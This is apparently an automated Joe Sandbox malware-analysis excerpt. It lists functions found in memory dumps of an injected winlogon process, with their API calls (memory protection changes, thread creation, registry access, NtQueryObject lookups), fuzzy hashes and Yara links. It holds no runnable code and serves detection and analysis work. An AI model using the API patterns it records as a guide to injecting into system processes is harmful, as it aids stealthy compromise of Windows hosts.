Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 4460526132078707f03e529f17315c9f8621164f7a74e4fe9c23d362e9fa087d
Instruction ID: c4fb3315ca78ad6c88cc819d43d3822fc1bb5b5b3bb77f142309b4c7efaf3f70
Opcode Fuzzy Hash: 4460526132078707f03e529f17315c9f8621164f7a74e4fe9c23d362e9fa087d
Instruction Fuzzy Hash: A802F933659B8886F761CB15F49079AB7A0F7C4799F500015EA8E87BA8DF7DC484CB42

Function 000001CA7D1E3EC8 Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F0E
VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F47
VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F68

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 4b0ed5361dff3adcda6195a5dc2af1083a8005ab2c1b804d84ff7dccd2579ba4
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 72115E37A5574493FB268B61E404A9AB7B0FB44B89F440026DA4D43798EF7EC954C7C3

Function 000001CA7D1B2EBC Relevance: 6.2, APIs: 4, Instructions: 240memorylibraryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 000001CA7D1B2F7B
VirtualProtect.KERNELBASE ref: 000001CA7D1B2FA5
LoadLibraryA.KERNELBASE ref: 000001CA7D1B302E
VirtualProtect.KERNELBASE ref: 000001CA7D1B31C2

Memory Dump Source

Source File: 00000008.00000003.1732974344.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_1ca7d1b0000_winlogon.jbxd

Similarity

API ID: Virtual$Protect$AllocLibraryLoad
String ID:
API String ID: 3316853933-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: fab056db1c559ce614da3632ff79b2cd998d8c65ade00f4a8a9fe06968449f78
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: B291F5B3F4139887EB558F29D400FA9B395FF55B98F9481249E4D07B88DA36D822C742

Function 000001CA7D1E4120 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 000001CA7D1E41A6
VirtualAlloc.KERNEL32 ref: 000001CA7D1E41E0

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
Instruction ID: 31ae54dde4bc601838691571fe20e4d19e02a82357ab131b83e5d70d6c66b96e
Opcode Fuzzy Hash: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
Instruction Fuzzy Hash: BD317533A55B4981FA32CB65F050B8A72A4F78878DF900535E5CD46B94DF3EC1408B83

Function 000001CA7D1E3A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000001CA7D1E3A35
PathFindFileNameW.SHLWAPI ref: 000001CA7D1E3A44

Part of subcall function 000001CA7D1E3F88: StrCmpNIW.SHLWAPI(?,?,?,000001CA7D1E272F), ref: 000001CA7D1E3FA0

Part of subcall function 000001CA7D1E3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3EDB
Part of subcall function 000001CA7D1E3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F0E
Part of subcall function 000001CA7D1E3EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F2E
Part of subcall function 000001CA7D1E3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F47
Part of subcall function 000001CA7D1E3EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F68

CreateThread.KERNELBASE ref: 000001CA7D1E3A8B

Part of subcall function 000001CA7D1E1E74: GetCurrentThread.KERNEL32 ref: 000001CA7D1E1E7F
Part of subcall function 000001CA7D1E1E74: CreateThread.KERNELBASE ref: 000001CA7D1E2043
Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2049
Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2055
Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2061
Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E206D
Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2079
Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2085

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: 5a3ca2a828a2f69e8ddffaa21c5641dcb192bd3c096c6af3b0a23b43865aa00f
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: FD116937E9070982FB66A722A549FE932A0BF84B4FFC000199406C11D0EF3BC58587D3

Function 000001CA7D1E5530 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000001CA7D1E5534
VirtualProtect.KERNEL32 ref: 000001CA7D1E5577
FlushInstructionCache.KERNEL32 ref: 000001CA7D1E558C

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: 50caac35bfbc2d5f59ac81492b3b3ec34dc9555305fb9744858cadce20ffe8b5
Instruction ID: d66c06046afa48536f3f5d6c761f082350603e171004f0d7298866914a91c0bf
Opcode Fuzzy Hash: 50caac35bfbc2d5f59ac81492b3b3ec34dc9555305fb9744858cadce20ffe8b5
Instruction Fuzzy Hash: BAF01237658B4880F6319B05E451B8A77A1FB887D9F544111BACD07769CA3AC580CB82

Function 000001CA7D1E1BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001CA7D1E1724: GetProcessHeap.KERNEL32 ref: 000001CA7D1E172F
Part of subcall function 000001CA7D1E1724: HeapAlloc.KERNEL32 ref: 000001CA7D1E173E
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17AE
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17DB
Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E17F5
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1815
Part of subcall function 000001CA7D1E1724: RegCloseKey.KERNELBASE ref: 000001CA7D1E1830
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1850
Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E186B
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E188B
Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E18A6
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E18C6

SleepEx.KERNELBASE ref: 000001CA7D1E1BDF

Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E18E1
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1901
Part of subcall function 000001CA7D1E1724: RegCloseKey.KERNELBASE ref: 000001CA7D1E191C
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E193C
Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1957
Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1977
Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1992
Part of subcall function 000001CA7D1E1724: RegCloseKey.KERNELBASE ref: 000001CA7D1E199C

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: 7242aede8837696ec19541534e1c3dce86efc3bfd9bee90a47d931ad18d557f5
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: D5312177A8070941FB529B22E940BE933A5BF44BC9F8A44618E0AC7295EE12C4D093F7

Function 000001CA7D29F370 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 000001CA7D29F390

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction ID: 63877a1f626742783a368f55fc0a60ee853d92ff197a70e3001fe82e698bde16
Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction Fuzzy Hash: B8D0C936B3165483F3019B11D855BD66228FB98705FC04009E949826949F7DC25ACB92

Function 000001CA7D21F370 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 000001CA7D21F390

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction ID: 96736f0284182aa4837be0ebcb41d10c413a553dbe389820e9d30482321e3cc7
Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction Fuzzy Hash: CFD0C936B3164483F3019B11D845BD56228BB98705FC04005E949826948F7DC25ACB92

Function 000001CA7D1EF370 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 000001CA7D1EF390

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction ID: bead2ac1358e17f089f294fb4c756c1d3e3800fd4e757aed294e48ae8c095ac3
Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
Instruction Fuzzy Hash: 58D01236B32644C3F301DB51D855BD67729FB98705FC04005E94982694DF7DC259CF92

Non-executed Functions

Function 000001CA7D292FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000001CA7D293094
lstrlenW.KERNEL32 ref: 000001CA7D2932BE

Part of subcall function 000001CA7D291A30: OpenProcess.KERNEL32 ref: 000001CA7D291A56
Part of subcall function 000001CA7D291A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001CA7D291A74
Part of subcall function 000001CA7D291A30: PathFindFileNameW.SHLWAPI ref: 000001CA7D291A83
Part of subcall function 000001CA7D291A30: lstrlenW.KERNEL32 ref: 000001CA7D291A8F
Part of subcall function 000001CA7D291A30: StrCpyW.SHLWAPI ref: 000001CA7D291AA2
Part of subcall function 000001CA7D291A30: CloseHandle.KERNEL32 ref: 000001CA7D291AB0

GetProcAddress.KERNEL32 ref: 000001CA7D2930A9

Part of subcall function 000001CA7D293F88: StrCmpNIW.SHLWAPI(?,?,?,000001CA7D29272F), ref: 000001CA7D293FA0

StrCmpNIW.SHLWAPI ref: 000001CA7D2930EC
lstrlenW.KERNEL32 ref: 000001CA7D293214

Strings

ntdll.dll, xrefs: 000001CA7D29308D
\Device\Nsi, xrefs: 000001CA7D2930DF
NtQueryObject, xrefs: 000001CA7D29309F

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 1b76cae57bb5ede7a876367774aa743c8adcc59447000feee719665bdef6a494
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 2EB17033A5879886FB568F25D400BDAB3A5FB84B99F845016DE09677A4DE36CC42C3C3

Function 000001CA7D212FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000001CA7D213094
lstrlenW.KERNEL32 ref: 000001CA7D2132BE

Part of subcall function 000001CA7D211A30: OpenProcess.KERNEL32 ref: 000001CA7D211A56
Part of subcall function 000001CA7D211A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001CA7D211A74
Part of subcall function 000001CA7D211A30: PathFindFileNameW.SHLWAPI ref: 000001CA7D211A83
Part of subcall function 000001CA7D211A30: lstrlenW.KERNEL32 ref: 000001CA7D211A8F
Part of subcall function 000001CA7D211A30: StrCpyW.SHLWAPI ref: 000001CA7D211AA2
Part of subcall function 000001CA7D211A30: CloseHandle.KERNEL32 ref: 000001CA7D211AB0

GetProcAddress.KERNEL32 ref: 000001CA7D2130A9

Part of subcall function 000001CA7D213F88: StrCmpNIW.SHLWAPI(?,?,?,000001CA7D21272F), ref: 000001CA7D213FA0

StrCmpNIW.SHLWAPI ref: 000001CA7D2130EC
lstrlenW.KERNEL32 ref: 000001CA7D213214

Strings

\Device\Nsi, xrefs: 000001CA7D2130DF
NtQueryObject, xrefs: 000001CA7D21309F
ntdll.dll, xrefs: 000001CA7D21308D

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: c99db775f95ad49f63960b31de7368144e072af91cd50a58f6ca275a580b9347
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 26B16F33A5479882FB669F25D400BD9B3A6FB44B98F94901AEE0953794DA37CD42C3C3

Function 000001CA7D1E2FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000001CA7D1E3094
lstrlenW.KERNEL32 ref: 000001CA7D1E32BE

Part of subcall function 000001CA7D1E1A30: OpenProcess.KERNEL32 ref: 000001CA7D1E1A56
Part of subcall function 000001CA7D1E1A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001CA7D1E1A74
Part of subcall function 000001CA7D1E1A30: PathFindFileNameW.SHLWAPI ref: 000001CA7D1E1A83
Part of subcall function 000001CA7D1E1A30: lstrlenW.KERNEL32 ref: 000001CA7D1E1A8F
Part of subcall function 000001CA7D1E1A30: StrCpyW.SHLWAPI ref: 000001CA7D1E1AA2
Part of subcall function 000001CA7D1E1A30: CloseHandle.KERNEL32 ref: 000001CA7D1E1AB0

GetProcAddress.KERNEL32 ref: 000001CA7D1E30A9

Part of subcall function 000001CA7D1E3F88: StrCmpNIW.SHLWAPI(?,?,?,000001CA7D1E272F), ref: 000001CA7D1E3FA0

StrCmpNIW.SHLWAPI ref: 000001CA7D1E30EC
lstrlenW.KERNEL32 ref: 000001CA7D1E3214

Strings

\Device\Nsi, xrefs: 000001CA7D1E30DF
NtQueryObject, xrefs: 000001CA7D1E309F
ntdll.dll, xrefs: 000001CA7D1E308D

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 4dfdd766fcca42df98d61a964e565b1f4d34243f24fb4b18c15cbeb28bb14d75
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 4EB16D73A5079982FB5A8F26D400BD9B3A5FF44F8AF845016EE4993795DE36C980C383

Function 000001CA7D2984B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001CA7D2984CC
RtlCaptureContext.NTDLL ref: 000001CA7D2984F9
RtlLookupFunctionEntry.NTDLL ref: 000001CA7D298513
RtlVirtualUnwind.NTDLL ref: 000001CA7D298554
IsDebuggerPresent.KERNEL32 ref: 000001CA7D2985A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000001CA7D2985C5
UnhandledExceptionFilter.KERNEL32 ref: 000001CA7D2985D0

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: b325f62a8c6918293bf4545d48a3dff6da009b34d28f8e70c2f43cb220add978
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 2E31B073600B8486FB618F60E840BEE7360FB84708F84402ADA4E4BB94DF39C149C792

Function 000001CA7D2184B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001CA7D2184CC
RtlCaptureContext.NTDLL ref: 000001CA7D2184F9
RtlLookupFunctionEntry.NTDLL ref: 000001CA7D218513
RtlVirtualUnwind.NTDLL ref: 000001CA7D218554
IsDebuggerPresent.KERNEL32 ref: 000001CA7D2185A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000001CA7D2185C5
UnhandledExceptionFilter.KERNEL32 ref: 000001CA7D2185D0

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
